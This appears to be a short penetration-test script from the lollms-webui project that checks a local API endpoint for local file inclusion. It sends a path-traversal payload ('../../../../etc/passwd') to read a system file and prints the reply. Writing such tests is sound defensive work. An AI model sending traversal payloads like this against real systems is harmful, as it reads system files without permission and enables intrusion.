lollms-webui/tests/pentests/local_file_inclusion/lfi_test.py

13 lines
301 B
Python
Raw Normal View History

2024-02-17 01:53:57 +00:00
import requests
# URL of your API endpoint
url = 'http://localhost:9600/user_infos/'
# Attempt to access etc/passwd
payload = {'path': '../../../../etc/passwd'}
response = requests.get(url, params=payload)
print(f'Response status: {response.status_code}')
print(f'Response body: {response.text}')